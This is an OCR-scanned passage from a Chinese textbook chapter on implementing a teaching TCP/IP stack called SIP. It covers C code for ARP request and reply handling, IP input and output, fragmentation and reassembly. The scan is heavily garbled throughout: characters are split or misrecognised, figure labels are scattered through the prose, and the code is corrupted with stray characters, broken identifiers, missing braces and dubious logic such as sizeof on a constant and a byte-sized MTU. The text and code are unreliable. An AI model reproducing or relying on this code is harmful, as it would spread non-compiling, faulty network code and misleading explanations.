memset (arph->ar tha, 0, dev->hwaddr len); 
/* 目 的 硬件 地 址 留 白 */ 


EXITarP_create: 
DBGPRINT (DBG LEVEL TRACE,"<==arp create\n"); 
return skb; 


19.5.6 SIP 地 址 解析 层 的 ARP 网 络 报 文 收发 处 理 函 数 
ARP 网 络 报 文 的 处 理 主要 为 从 网 络 接口 层 接收 到 的 ARP 类 型 网 络 数据 的 分 析 和 响应 。 
1. arp_input() 函 数 的 原理 
SIP 中 的 实现 函数 为 arp_input()， 如 图 19.16 所 示 。 


数据 长 度 >ARP 
头 部 结构 长 度 


ARP 结 
构 目的 IP 地 址 为 本 
机 IP 地 址 


ARP 请 求 报 文 
ARPOP_REQUEST 


2 ARP 响 应 报 文 
关 ARP 响 应 
发 送 ARP 响 应 ARPOP_REPLY 


ge 


更 新 ARP 映 射 表 


图 19.16 SIP 中 ARP 输入 数据 的 处 理 过 程 示意 图 
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函数 首先 对 以 太 网 层 数据 的 长 度 进行 判断 ， 查 看 是 否 大 于 以 太 网 头 部 的 长 度 ， 然后 查 
看 ARP 头 部 结构 中 目的 人 P 地 址 是 否 为 本 机 地 址 ， 如 果 符合 要 求 ， 则 根据 ARP 协议 的 类 型 
进行 不 同 的 处 理 : 当 类 型 为 ARP 请 求 时 , 发 送 ARP 响应 数据 报 文 , 然后 更 新 ARP 映射 表 ; 


当 类 型 为 ARP 响应 报 文 的 时 候 ， 更 新 ARP 映射 表 。 


2. arp_input() 函 数 相 关 代码 的 实现 
(1) arp_input() 函 数 的 代码 实现 如 下 : 


int arp input(struct skbuff **pskb, struct net device *dev) 


{ 
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struct skbuff *skb = *pskb; 
be32 ip = 0; 
DBGPRINT (DBG_LEVEL TRACE,"==>arp_input\n"); 
if(skb->tot len < sizeof(struct sip arphdr)) 
/* 接 收 到 的 网 络 数据 总 长 度 小 于 ARP 头 部 长 度 */ 

{ 

goto ExITarp input; /* 错 误 , 返回 */ 
} 


ip = *(_ be32*) (skb->nh.arph->ar tip) ; 
/*ARP 请 求 的 目的 地 址 */ 
if(ip == dev->ip host.s addr) /* 为 本 机 IP?*/ 
{ 
update arp entry(ip，dev->hwaddr); /* 更 新 ARP 表 */ 
. 
Switch (ntohs (skb->nh.arph->ar_op)) /* 查 看 ARP 头 部 协议 类 型 */ 
{ 
case ARPOP REQUEST: /*ARP 请 求 类 型 */ 
{ 
struct in addr t addr; 
t addr.s addr = *(unsigned int*)skb->nh.arph->ar_sip;/*ARP 请 
求 源 IP 地 址 */ 
DBGPRINT (DBG LEVEL ERROR,"ARPOP REQUEST, FROM:%s\n",inet nt- 
oal(lt_addr)); 
/* 向 ARP 请 求 的 IP 地 址 发 送 应 答 */ 
arp_send (dev, 
ARPOP_ REPLY, 
dev->ip host.s _addr, 
*(__u32*) skb->nh.arph->ar_sip, 
dev->hwaddr, 
skb->phy.ethh->h source, 
skb->nh.arph->ar_sha); 


/* 将 此 项 ARP 映射 内 容 加 入 映射 表 */ 


arp_add entry(*(_ u32*) skb->nh.arph->ar sip,skb->phy.ethh->h_ source, 
ARP ESTABLISHED); 
} 
break; 
case ARPOP REPLY: /*ARP 应 答 类 型 */ 


/* 将 此 项 ARP 映射 内 容 加 入 映射 表 */ 


arp_add entry(*(_ u32*#)skb->nh.arph->ar_ sip,skb->phy.ethh->h_source, 
ARP_ESTABLISHED); 
break; 


} 
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b 

DBGPRINT (DBG LEVEL TRACE,"<==arp input\n"); 
EXxITarp_input: 

return; 


(2) 在 arp_input() 函 数 的 实现 中 调用 了 arp_send() 函 数 和 arp_request() 函 数 。arp_send() 


函数 使 用 arp_create(0) 函 数 构建 一 个 ARP 网 络 报 文 ， 通 过 网 络 接 口 层 的 底层 linkoutput() 函 
数 发 送出 去 。arp_send0) 函 数 的 代码 实现 如 下 : 
void arp_send(struct net device *dev, /* 设 备 #/ 
int type, /*ARP 协议 的 类 型 */ 
下 3323SECESDE /* 源 主机 IPB+/ 
32Tdesteipy /* 目 的 主机 IP*/ 
_u8* src_hwy /* 源 主机 MAC*/ 
_u8* dest_hw, /* 目 的 主机 MAC*/ 
_u8* target hw) /* 解 析 的 主机 MAC*/ 


b 


struct skbuff *skb; 
DBGPRINT (DBG LEVEL TRACE,"==>arp send\n"); 
/* 建 立 一 个 ARP 网 络 报 文 */ 
skb = arp create (dev,type,src ip,dest ip,src hw,dest hw,target hw); 
if (skb) /* 建 立成 功 */ 
{ 
dev->linkoutput (skb, dev); /* 调 用 底层 的 网 络 发 送 函 数 */ 


} 
DBGPRINT (DBG_LEVEL TRACE, "<==arp_send\n"); 


(3) arp_request() 函 数 的 实现 。arp_request() 函 数 的 作用 是 向 某 个 IP 地 址 发 送 ARP 请 


这 个 函数 的 作用 是 在 ARP 映射 表 中 没有 查找 到 合适 的 卫 映射 项 的 时 候 ， 用 于 向 目标 
主机 发 送 ARP 请 求 获得 匹配 对 ， 匹 配对 的 构建 过 程 是 在 ARP 响应 的 处 理 过 程 中 实现 的 。 
arp_requestO 函 数 的 实现 具体 过 程 如 下 ， 先 查看 目标 主机 和 本 机 IP 地 址 是 否 在 同一 个 


子 网 中 ， 


如 果 不 在 同一 个 子 网 中 ， 则 将 此 请 求 发 送 给 网 关 ， 让 网 关 对 数据 进行 转发 ， 然 后 


调用 arp_create() 函 数 构建 一 个 ARP 请 求 报 文 ;最 后 将 成 功 构建 的 网 络 报 文通 过 linkoutputO 


int arP_request (struct net device *dev, _ u32 ip) 


L 


struct skbuff *skb; 

DBGPRINT (DBG_LEVEL TRACE,"==>arp_request\n"); 
u32 tip = 0; 

/* 查 看 请 求 的 IP 地 址 和 本 机 IP 地 址 是 否 在 同一 个 子 网 上 */ 


if( (ip & dev->ip netmask.s addr) /* 请 求 的 IP 地 址 */ 

-- /* 同 一 子 网 */ 

(dev->ip host.s addr & dev->ip netmask.s addr ) ) 

/* 本 机 的 IP 地址 */ 

{ 

tip = ip; /* 同 一 子 网 ,此 IP 为 目的 IP*/ 
} 
else /* 不 同 子 网 */ 


se 
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{ 
tip = dev->ip gw.s addr; /* 目 的 IP 为 网 关 地 址 */ 


上 
/* 建 立 一 个 ARP 请 求 报 文 ,其 中 的 目的 IP 为 上 述 地 址 */ 
Skb = arp_create (dev, 

ARPOP REQUEST, 

dev->ip host.s addr, 

tip, 


dev->hwaddr, 
NULL, 
NULL); 
if (skb) /* 建 立 skbuff 成 功 */ 
{ 
dev->linkoutput (skb, dev); /* 通 过 底层 网 络 函 数 发 送 */ 


} 
DBGPRINT (DBG_LEVEL TRACE,"<==arp_request\n"); 


19.6 ”SIP 网 络 协议 栈 的 IP 层 


SIP 网 络 协议 栈 的 IP 层 主要 进行 底层 (网 络 接口 层 ) 数据 的 接收 和 上 层 (ICMP、UDP 
和 TCP) 网 络 数据 的 发 送 , 在 对 到 达 该 模块 的 网 络 数据 进行 IP 协议 层 的 处 理 后 ,分 发 给 其 
上 下 模块 进行 处 理 。IP 层 中 所 涉及 的 主要 难点 是 IP 数据 的 分 片 和 重组 的 操作 。 


19.6.1 SIP 网 际 协议 层 的 架构 
如 图 19.17 所 示 ，IP 层 的 架构 主要 分 为 两 个 部 分 : 


IP 分 片 重组 


网 络 数据 输出 
函数 ip-_output0)| 


网 络 数据 输入 
函数 ip _input0) 


| 
物理 层 模块 


图 19.17 IP 层 的 架构 


口 网 络 数据 的 输入 主要 由 函数 in_input0 来 完成 ， 用 户 处 理 从 网 络 接口 层 接收 到 的 网 

络 数 据 。 这 个 函数 中 对 网 络 数据 进行 合法 性 的 判断 ， 如 果 卫 分 片 需要 重组 则 调用 
重组 函数 进行 分 片 重组 ， 最 后 根据 网 络 协议 的 类 型 分 发 给 上 层 的 不 同 模块 进行 
处 理 。 
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网 络 数据 的 输出 主要 由 ip_output0 函 数 来 完成 , 它 处 理 来 自 上 层 模 块 的 数据 发 送 请 
求 。 这 个 函数 中 主要 对 IP 的 头 部 进行 填充 ， 进 行 校 验 和 计算 ， 如 果 上 层 传 入 的 网 
络 数据 过 大 ， 则 进行 IP 的 分 片 处 理 ， 最 后 调用 网 络 接口 层 的 发 送 函 数 ， 交 由 网 络 
接口 层 处 理发 送 的 数据 。 


19.6.2 SIP 网 际 协议 层 的 数据 结构 
在 IP 层 的 数据 结构 主要 有 了 IP 的 头 部 结构 和 卫 分 片 重组 结构 。 
1. IP 头 部 的 数据 结构 代码 


IP 头 部 的 数据 结构 在 前 面 章节 中 已经 有 过 介绍 ,这 里 给 出 数据 结构 的 代码 定义 及 示意 
图 。IP 头 部 数据 结构 的 代码 定义 如 下 ， 示 意图 参见 图 19.18。 


struct sip iphdr 


{ 
#if defined( LITTLE ENDIAN BITFIELD) 


u8 ihl:4, 
version:4; 


#elif defined (__ BIG ENDIAN BITFIELD) 


u8 version:4, 
hid 


#else 
#error "Please fix <asm/byteorder.h>" 
#endif 


_u8 tos; 
be16 tot len; 
bel6 id” 
_bel6 frag off; 
_u8 ttl; 
u8 protocol; 
_ul6 check; 
_be32 saddr; 
be32 daddr; 
/*The options start here. */ 


0 1516 31 
ihl version tos tot_len 
id frag _off 
ttl | protocol | check 20 丰 字 池 
saddr 
daddr 
选项 (32 位 ) 
数据 


图 19.18 IP 头 部 数据 结构 示意 图 


= 


2. IP 分 片 重组 的 数据 结构 代码 
IP 分 片 重组 的 数据 结构 定义 代码 实现 如 下 : 


struct sip reass 


struct sip reass *Nnext; 
struct skbuff *Skb; 
struct iphdr iphdr; 
_ul6 datagram len; 
_u8 flags; 

u8 timer; 


案例 


/* 下 一 个 重组 指针 */ 
/* 分 片 的 头 指针 */ 
/*IP 头 部 结构 */ 

/* 数 据 报 文 的 长 度 */ 
/* 重 组 的 状态 */ 

/* 时 间 戳 */ 


IP 分 片 重组 的 数据 结构 如 图 19.19 所 示 , 结构 structure sip_reass 的 成 员 变 量 含义 如 下 : 


参数 next 用 于 指向 下 一 个 重组 结构 指针 ; 
参数 skb 为 某 个 IP 分 片 分 组 的 头 指针 ; 


参数 flags 表示 分 片 重组 的 状态 ; 


OOOOODD 


个 变量 进行 超时 计算 。 


参数 iphdr 为 IP 头 部 结构 用 于 标识 一 个 卫 分 组 ; 
参数 datagram_len 表示 当前 IP 分 组 中 数据 报 文 的 长 度 ; 


下 一 个 重组 指针 
struct sip_reass 分 片 的 头 指针 
Struct sip_reass IP 头 部 结构 
struct skbuff 数据 报 文 的 长 度 
struct iphdr 重组 的 状态 
_ul6 datagram+tlen; 时 间 惟 
_u8 flags; 
ug timer 


图 19.19 ”IP 分 片 重组 的 数据 结构 示意 图 


IP 分 片 重组 的 数据 结构 可 以 构成 分 片 重组 的 链表 , 如 图 19.20 所 示 为 进行 IP 分 片 寻 


参数 timer 表示 最 后 接 到 当前 重组 分 片 的 时 间 蕉 ,防止 重组 分 片 的 失败 ， 可 以 用 这 


EE 组 


组 成 一 个 IP 分 组 如 


组 的 链表 ， 而 每 个 卫 习 
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过 程 中 某 个 时 间 点 的 数据 结构 。 数 据 结构 sip_reass 中 的 next 成 员 变量 将 多 个 IP 重组 分 组 


组 分 组 中 的 卫 分 片 放 在 结构 skbu 任 类 型 成 员 变 
量 skb 组 成 的 链表 中 。 所 以 对 于 结构 struct sip_reass 中 的 next 成 员 ， 每 一 个 都 是 一 个 没有 
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完成 耳 分 片 重组 的 单元 ， 进 行 瑟 分 片 重组 的 过 程 就 是 查找 next 成 员 变量 ， 对 skb 变量 进 
行 匹配 的 过 程 。 


NULL 
struct sip_reass struct sip_reass struct sip_reass 1 
struct sip _reass next ; struct sip_reass next ; — struct sip_reass *next ; 
struct skbuff *skb; struct skbuff *skb; struct skbuff *skb; 
struct iphdr iphdr; | struct iphdr iphdr ; struct iphdr iphdr ; 
_u6 datagram _len; _ul6 datagram len; _ul6 datagram_len; 
_uw flags ; _u8 flags; _uw flags; 
u8 timer u8 timer ; u8 timer 
内 存 区 域 struct skbuff 内 存 区 域 struct skbuff 
一 人 | struct skbuff *next; struct skbuff *mext; 
| 内 存 区 域 struct skbuff 
struct skbuff 和 next ; 


NULL 


图 19.20 IP 分 片 重组 的 过 程 示 意图 


19.6.3 ”SIP 网 际 协议 层 的 输入 函数 
IP 层 的 输入 函数 从 网 络 接口 层 接 收 网 络 数据 进行 各 种 合法 性 判断 后 进行 相应 的 处 理 。 
1. IP 输入 函数 的 处 理 步 又 


IP 层 输入 数据 的 处 理 过 程 如 图 19.21 所 示 。IP 层 输入 函数 的 主要 处 理 过 程 分 为 如 下 
步 又 : 

(1) 判断 网 络 数据 的 合法 性 ， 包 含 网 络 数据 长 度 的 合法 性 、 卫 版 本 的 合法 性 、 目的 全 
地 址 的 合法 性 等 。 

(2) 计算 IP 头 部 的 校 验 和 ， 检 查 计算 结果 ， 判 断 IP 数据 是 否 正确 。 

(3) 如 果 了 P 层 的 网 络 数据 的 偏 移 域 不 为 零 ， 表 明 接 收 到 的 数据 是 一 个 卫 分 片 ， 需 要 
进行 P 分 片 的 重组 处 理 后 才能 使 用 。 

(4) 最 后 判断 IP 头 部 的 协议 类 型 , 根据 协议 类 型 的 不 同调 用 不 同 的 上 层 协 议 模块 进行 
处 理 。 如 果 为 ICMP 协议 ， 则 调用 icmp_input(O) 函 数 进行 处 理 ; 如 果 为 UDP 协议 ， 则 调用 


“Ss 


udp_input(O) 函 数 进 行 处 理 。 


icmp_input udp_input 


UDP 


分 片 重组 


sip_reassmble 


图 19.21 IP 层 输入 数据 的 处 理 过 程 


2. IP 输入 函数 代码 实现 的 相关 代码 
(1) ip_input0 函 数 的 代码 。IP 层 输 入 处 理 的 函数 实现 代码 如 下 : 


int ip input(struct net device *#dev, struct skbuff *skb) 
‘ 

DBGPRINT (DBG LEVEL TRACE,"==>ip input\n"); 

struct sip iphdr *#iph = skb->nh.iph; 

int retval = 0; 


if(skb->len < 0) /* 网 络 数据 长 度 不 合法 */ 
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skb free(skb) ; /*# 释 放 结构 */ 
retval = -1; /* 设 置 返 回 值 */ 
goto EXITip input; /* 退 出 #/ 
上 
if(iph->version != 4) /*IP 版 本 不 合适 ,不 是 ITPv4*/ 


Skb_free (skb); 
retval = -1; 
goto EXITip input; 
1 
_ ul16 hlen = iph->ih1l<<2; /* 计 算 IP 头 部 长 度 */ 
if(hlen < IPHDR LEN) /* 长 度 过 小 */ 
Skb free(skb); 
retval = -1; 
goto EXITip input; 
if(skb->tot len - ETH HLEN < ntohs (iph->tot len)) 


/* 计 算 总 长 度 是 否 合法 */ 
人 
Skb free (skb); 
retval = -1; 
goto EXITip input; 
| 
if(hlen < ntohs (iph->tot len)) /* 头 部 长 度 是 否 合法 */ 


{ 
Skb free(skb); 
retval = -1; 
goto EXITip input; 
} 
if(SIP Chksum(skb->nh.raw, IPHDR_LEN)) 
/* 计 算 IP 头 部 的 校 验 和 , 是否 正确 ,为 0*/ 
{ 
DBGPRINT (DBG_LEVEL ERROR, "IP check sum error\n"); 
Skb free(skb); 
retval= -1; 
goto EXITip input; 
} 


else /* 校 验 和 合法 */ 

{ 
skb->ip_summed = CHECKSUM HW; /* 设 置 IP 校 验 标记 */ 
DBGPRINT (DBG_LEVEL NOTES, "IP check sum success\n"); 

} 

if((iph->daddr != dev->ip host.s addr /* 不 是 发 往 本 地 */ 
&& !IP_IS BROADCAST (dev, iph->daddr) /* 目 的 地 址 不 是 广播 地 址 */ 
| 1IP_IS_BROADCAST (dev, iph->saddr))) /* 源 地 址 不 是 广播 地 址 */ 


DBGPRINT (DBG_LEVEL NOTES, "IP address INVALID\n"); 
Skb free( skb); 
retval= -1; 
goto EXITip input; 
1 


if((ntohs (iph->frag off) & Ox3FFF) !=0) /* 有 偏 移 , 是 一 个 分 片 */ 
{ 
Skb = sip_reassemble (skb); /* 进 行 分 片 重组 */ 
if(!skb){ /* 重 组 不 成 功 */ 


we 
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retval = 0; 
goto EXITip input; 


} 


switch (iph->protocol) /*IP 协议 类 型 */ 
case IPPROTO ICMP: /*ICMP 协议 */ 
skb->th.icmph = /*ICMP 头 部 指针 获取 */ 


(struct sip icmphdr*)skb put(skb, sizeof(struct sip icm- 


phdr)); 
icmp input (dev, skb); /+* 转 给 ICMP 模块 处 理 */ 
break; 
case IPPROTO UDP: /*UDP 协议 */ 
skb->th.udph = /*UDP 头 部 指针 获取 */ 


(struct sip udphdr*) skb_Put(skb， 


dr)); 
SIP_UDPInput (dev, skb); 
break; 
default: 
break; 


} 


EXITip input: 


} 


DBGPRINT (DBG_LEVEL TRACE,"<==ip_input\n"); 


return retval; 


sizeof (struct sip_ udph- 


/* 转 给 UDP 模块 处 理 */ 


(2) IP IS BROADCAST(O 函 数 代 码 。 
在 IP 层 的 输入 处 理 中 对 目的 IP 地 址 进行 合法 性 判断 时 ,调用 了 IP_IS_BROADCASTO 
函数 ， 这 个 函数 的 实现 代码 如 下 : 


inline int IP_IS BROADCAST(struct net device *dev, _ be32 ip) 


{ 


“a 


int retval = 1; 


if((ip == IP_ADDR ANY VALUE) 
11(~ip == IP_ADDR ANY VALUE)) 
{ 


/*IP 地 址 为 本 地 任意 IP 地 址 */ 
/* 或 者 为 按 位 取 反 IP 地 址 */ 


DBGPRINT (DBG_LEVEL NOTES, "IP is ANY ip\n"); 


retval = 1; /* 是 广播 地 址 */ 
goto EXITin addr isbroadcast; /* 退 出 */ 
Jelse if(ip == dev->ip host.s addr) { ”/*IP 地 址 为 本 地 地 址 */ 


DBGPRINT (DBG LEVEL NOTES, "IP is local ip\n"); 


retval = 0; 
goto EXITin addr isbroadcast; 
Jelse if(((ipg&dev->ip netmask.s_addr) 


/* 不 是 广播 地 址 */ 
/* 退 出 *#/ 
/*IP 地 址 为 本 子 网 内 地 址 */ 


== (dev->ip host.s addr &dev->ip netmask.s_addr)) 


&& ((ip & ~dev->ip netmask.s_addr) 


/* 与 广播 地 址 同 网 段 */ 


==(IP_ADDR BROADCAST VALUE & ~dev->ip netmask.s addr))){ 


DBGPRINT (DBG LEVEL NOTES, 


"Tp Es ANY 4p\n")s 


retval =1; /* 是 广播 地 址 */ 
goto EXITin addr isbroadcast; /* 退 出 */ 
}elsel{ /* 不 是 广播 IP 地 址 */ 


retval = 0; 


} 
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EXITin addr isbroadcast: 
return retval; 


} 
19.6.4 SIP 网 际 协议 层 的 输出 函数 


IP 层 的 输出 函数 对 上 层 模 块 的 网 络 数据 进行 处 理 ， 并 调用 底层 模块 的 实现 将 数据 发 送 
出 去 。SIP 网 络 协议 栈 中 IP 层 的 输出 函数 为 ip_output() 函 数 ， 如 图 19.22 所 示 ， 函 数 主要 
实现 如 下 功能 

口 根据 输入 填充 人 P 头 部 结构 中 的 协议 类 型 、 服 务 类 型 、 生 存 时 间 、 目 的 耳 地 址 、 源 

IP 地 址 等 参数 构造 IP 头 部 结构 。 

口 进行 他 头 部 校 验 和 计算 ， 将 计算 结果 填 入 IP 头 部 的 校 验 和 域 。 

口 判断 上 层 模 块 中 传 入 的 网 络 数 据 是 否 过 长 ， 如 果 超 过 以 太 网 的 最 大 长 度 MTU， 则 

需要 进行 IP 分 片 处 理 。 

口 最 后 将 网 络 数据 通过 网 络 接口 层 的 output() 函 数 发 送出 去 。 


轩 炎 部 地 说 状 开 服务 类 
型 、 生 存 时 间 \ 目 的 地 址 、 
源 地 址 设置 


IP 头 部 校 验 和 计算 


网 络 数据 过 长 


发 送 网 络 数据 


dev->output 


图 19.22 人 P 层 的 输出 函数 
IP 层 输出 处 理 的 函数 实现 代码 如 下 : 


int ip output(struct net device *dev， struct skbuff *skb, 
struct in addr *src, struct in addr *dest, 
vd ttl u8 tos, u8 proto) 


struct sip iphdr *iph = skb->nh.iph; /*IP 头 部 指针 获得 */ 


iph->protocol = proto; /* 协 议 类 型 设置 */ 
iph->tos = tos; /* 服 务 类 型 设置 */ 
iph->ttl = ttl; /* 生 存 时 间 设 置 */ 


“ys 
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iph->daddr = dest->s addr; 
iph->saddr = src->s addr; 
iph->check = 0; 
iph->check = 


/* 设 置 目的 IP 地 址 */ 
/#* 设 置 源 IP 地 址 */ 
/* 校 验 和 初始 化 为 0*/ 


(SIP Chksum(skb->nh.raw, sizeof(struct sip iphdr))); 


/*IP 头 部 校 验 和 计算 */ 


if(SIP Chksum(skb->nh.raw, sizeof(struct sip iphdr)))/**/ 


{ 
DBGPRINT (DBG LEVEL ERROR, 
上 


else 
ii 
DBGPRINT (DBG_LEVEL_NOTES， 
} 
Skb->len =skb->tot len; 
if(skb->len > dev->mtu){ 
Skb= ip_frag(dev, skb); 


"ICMP check IP sum error\n"); 


"ICMP check IP sum success\n"); 


/* 设 置 网 络 数据 的 总 长 度 */ 
/* 如 果 网 络 数 据 超过 以 太 网 的 MTU*/ 
/* 进 行 分 片 */ 


dev->output ( skb,dev); /* 通 过 以 太 网 的 输出 函数 发 送 数 据 */ 
19.6.5 ”SIP 网 际 协议 层 的 分 片 函数 
当 上 层 模块 中 的 网 络 数据 过 长 时 ， 在 IP 层 需要 进行 网 络 数据 的 分 片 处 理 ，IP 分 片 和 


IP 组 装 是 一 个 互 逆 的 过 程 。 
则 是 在 第 


部 信息 ， 所 以 需要 重新 构建 人 P 分 片 的 头 部 信息 。 


在 


DOODODOD 


IP 分 片 的 构建 过 程 中 有 儿 个 需要 注意 的 事项 : 

每 个 分 片 的 大 小 介 于 以 太 网 最 大 数据 长 度 和 最 小 的 数据 长 度 之 间 。 
第 一 个 分 片 的 信息 包含 源 分 组 中 IP 头 部 的 信息 。 

进行 分 片 后 要 设置 偏 移 标 志 。 

进行 分 片 后 要 重新 计算 IP 的 头 部 校 验 和 。 

最 后 一 个 分 片 要 设置 分 片 结束 位 标志 ， 只 有 通过 这 个 标志 才能 

和 IP 分 组 数据 的 具体 长 度 


IP 分 片 的 函数 ip_frag() 实 现代 码 如 下 : 


struct skbuff * ip frag(struct net device *dev, struct skbuff *skb) 


gf 


。594 。 


u8 frag num = 0; 
ul6 tot len = ntohs (skb->nh.iph->tot len); 
_ _u8 mtu = dev->mtu; 
uu8 half mtu = (mtu+1)/2; 
frag num = (tot len - IPHDR LEN + half mtu)/(mtu - IPHDR LEN - ETH 


道 卫 分 片 的 结 


IP 分 片 的 处 理 主 要 是 在 新 IP 头 部 的 构建 上 ， 由 于 IP 分 片 的 原 
-个 分 片 中 包含 源 网 络 数据 分 组 中 的 IP 头 部 , 在 其 余 的 分 组 中 都 不 包含 此 项 的 头 


束 


HLEN) ， /* 计 算 分 片 的 个 数 */ 
ul6i= 0; 
struct skbuff *skb h = NULL,*skb 七 = NULL,*skb c = NULL; 
for(i = 0,skb->tail = skb->head; i<frag num;i++) 
if (i ==0){ /* 第 一 个 分 请 */ 
skb 七 = skb alloc (mtu); /* 申 请 内 存 */ 


skb t->phy.raw = skb Put(skb t，ETH HLEN); /* 物 理 层 */ 


} 
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skb t->nh.raw = skb put (skb t, IPHDR LEN); /* 网 络 层 */ 


memcpy (skb t->head, skb->head, mtu); /* 复 制 数据 */ 
skb put (skb,mtu); /* 增 加 数据 长 度 len 值 */ 
skb t->nh.iph->frag off = htons (0x2000); 
/* 设 置 偏 移 标记 值 */ 
Skb 七 ->nh.iph->tot len = htons (mtu-ETH HLEN) 
/* 设 置 IP 头 部 总 长 度 */ 
skb t->nh.iph->check = 0; /* 设 置 校 验 和 为 0*/ 
skb t->nh.iph->check = SIP Chksum(skb t->nh.raw, IPHDR LEN); 
/* 计 算 校 验 和 */ 
skb h = skb c =skb t; /* 头 部 分 片 指 针 设置 */ 
}else if(i==frag num -1){ /* 最 后 一 个 分 片 */ 
skb 七 = skb alloc(mtu) /* 申 请 内 存 */ 


skb t->phy.raw = skb put (skb t，ETH HLEN); /* 物 理 层 */ 
skb t->nh.raw = skb put (skb t, IPHDR LEN); /* 网 络 层 */ 


memcpy (skb t->head, skb->head, ETH HLEN + IPHDR LEN); 


/+* 复 制 数据 */ 
memcpy (skb t->head + ETH HLEN + IPHDR LEN, skb->tail, skb->end 
- skb->tail); /* 增 加 数据 长 度 len 值 */ 
skb t->nh.iph->frag off = htons (i*(mtu - ETH HLEN - IPHDR LEN) 
+ IPHDR LEN); /* 设 置 偏 移 标记 值 */ 
skb t->nh.iph->tot len = htons(skb->end - skb->tail + IPHDR 
LEN); /* 设 置 IP 头 部 总 长 度 */ 
skb t->nh.iph->check = 0; /* 设 置 校 验 和 为 0*/ 
skb t->nh.iph->check = SIP Chksum(skb t->nh.raw, IPHDR LEN); 
/* 计 算 校 验 和 */ 
Skb c->next=skb t; /* 挂 接 此 分 片 */ 


}elsel{ 


} 


skb t->ip summed = 1; 


Skb 七 = skb alloc (mtu); 
Skb t->phy.raw = skb put (skb t, ETH HLEN); 
skb t->nh.raw = skb put (skb t, IPHDR LEN); 


memcpy (skb t->head, skb->head, ETH HLEN + IPHDR LEN); 

memcpy (skb t->head + ETH HLEN + IPHDR LEN, skb->tail, mtu - 

ETH HLEN - IPHDR LEN); 

skb put(skb t, mtu - ETH HLEN - IPHDR LEN); 

skb t->nh.iph->frag off = htons ((i* (mtu - ETH HLEN - IPHDR LEN) 
+ IPHDR LEN) |0x2000); 

skb t->nh.iph->tot len = htons (mtu - ETH HLEN); 

Skb t->nh.iph->check = 0; 

Skb 七 ->nh.iph->check = SIP Chksum(skb t->nh.raw, 
Skb c->next=skb 七 7 

skb c= skb 七 7 


IPHDR LEN); 


/* 已 经 进行 了 IP 校 验 和 计算 */ 


skb free(skb); /* 释 放 原 来 的 网 络 数 据 */ 
return skb h; /* 返 回 分 片 的 头 部 指针 */ 
} 
19.6.6 SIP 网 际 协 议 层 的 分 片 组 装 函数 
IP 组 装 过 程 是 分 片 过 程 的 逆 过 程 ， 实 现代 码 如 下 : 
struct skbuff *sip reassemble(struct skbuff+ skb) 


ss 
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struct sip iphdr *fraghdr = skb->nh.iph; 
int retval = 0; 
ul6 offset, len; 
int found = 0; 
offset = (fraghdr->frag off & OxlFFF)<<3; 
/* 取 得 IP 分 组 偏 移 地 址 , 32 位 长 */ 
len = fraghdr->tot len - fraghdr->ihl<<2; 


/*IP 分 组 的 数据 长 度 */ 
struct sip reass *ipr = NULL,*ipr prev = NULL; 
for (ipr_pPrev = ipr= ip reass list; ipr != NULL; ) 


{ 
if (time (NULL) -ipr->timer > IPREASS TIMEOUT) 


/* 此 分 组 是 超时 */ 
{ 
if (ipr prev == NULL) /* 第 一 个 分 片 */ 
{ 
ipr prev = ipr; /* 更 新 守护 的 指针 为 本 分 组 */ 
ip_reass list->next = ipr = ipr->next; 

/* 将 超时 的 分 片 从 重组 链表 上 取 下 来 */ 
ipr = ipr->next; /* 更 新 当前 的 分 组 指针 */ 
IP_FREE REASS (ipr_prev);  ”/* 释 放 资 源 */ 
ipr_ prev->next =NULL; /* 重 置 指针 为 空 */ 
continue; /* 继 续 查 找 合 适 的 分 组 */ 

} 

else /* 不 是 第 一 个 分 组 #/ 

{ 
ipr_prev->next = ipr->next; /* 从 分 片 链 表 上 摘除 当前 链 */ 
IP_FREE REASS (ipr); /* 释 放 当前 重组 链 */ 
ipr = ipr_ prev->next; /* 更 新 当前 链 的 指针 */ 
continue; /* 继 续 查 找 */ 

} 

} 

/* 分 片 是 否 输入 此 条 链 */ 

if (ipr->iphdr.daddr == fraghdr->daddr 


/* 目 的 IP 地 址 匹配 */ 
&&ipr->iphdr.saddr == fraghdr->saddr ”/#* 源 IP 地址 匹配 x/ 


&&ipr->iphdr.id == fraghdr->id) /* 分 片 的 ID 匹配 */ 
{ 
found = 1; /* 属 于 这 条 链 */ 
break; 
} 
} 
if(!found) /* 没 有 找到 合适 的 分 组 链 */ 
ipr prev = NULL; /* 初 始 化 为 空 #/ 
ipr = (struct sip_reass*)malloc (sizeof(struct sip reass)); 
/* 申 请 一 个 分 组 数据 结构 */ 
(Ue) /* 申 请 失败 */ 
{ 
retval = -1; /* 返 回 值 -1*/ 
goto freeskb; /* 退 出 */ 


上 


memset (ipr, 0, sizeof(struct sip reass)); 


/* 初 始 化 分 组 结构 */ 


-S's 
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ipr->next = ip reass list; /* 将 当前 分 组 结构 挂 接 到 分 组 链 的 头 部 */ 


ip_reass list = ipr; 
memcpy (&ipr->iphdr, skb->nh.raw, sizeof (IPHDR LEN)); 


/* 复 制 IP 的 数据 头 部 ,便于 之 后 的 分 片 匹配 */ 


}else{ /* 找 到 合适 的 分 组 链 */ 
if(((fraghdr->frag off & OxlFFF) == 0) 
/* 当 前 数据 位 于 分 片 第 一 个 */ 
&& ( (ipr->iphdr.frag off & OxlFFF) != 0)) 


/* 分 组 链 上 的 头 部 不 是 第 一 个 分 片 */ 


memcpy (&ipr->iphdr, fraghdr, IPHDR LEN); 
/* 更 新 重组 中 的 IP 头 部 结构 */ 


} 
/* 检查 是 否 为 最 后 一 个 分 组 */ 
if( (fraghdr->frag off & htons(0x2000)) == 0) { 
/* 没 有 更 多 分 组 */ 
#define IP REASS FLAG LASTFRAG 0x01 
ipr->flags |= IP_ REASS _ FLAG LASTFRAG; 
/* 设 置 最 后 分 组 标志 */ 
ipr->datagram len = offset + len; 


/* 设 置 IP 数据 报 文 的 全 长 */ 


/* 将 当前 的 数据 放 到 重组 链 上 , 并 更 新 状态 */ 
struct skbuff *skb prev=NULL, *skb cur=NULL; 
int finish =0; 
void *pos = NULL; 
_u32 length = 0; 
#define FRAG OFFSET(iph) (ntohs (iph->frag off & OxlFFF)<<3) 
#define FRAG LENGTH(iph) (ntohs (iph->tot _ len) - IPHDR LEN) 
for(skb prev =NULL, skb cur=ipr->skb,length = 0,found = 0; 
skb _cur != NULL && !found; 
Skb_prev=skb cur,skb cur = skb_cur->next) 


} 


if(skb prev !=NULL) /* 不 是 第 一 个 分 片 */ 
|! 
if((offset < FRAG OFFSET (skb cur->nh.iph)) 
/* 接 收 数据 的 偏 移 值 位 于 前 后 两 个 之 间 */ 
&& (offset > FRAG OFFSET(skb prev->nh.iph))) 


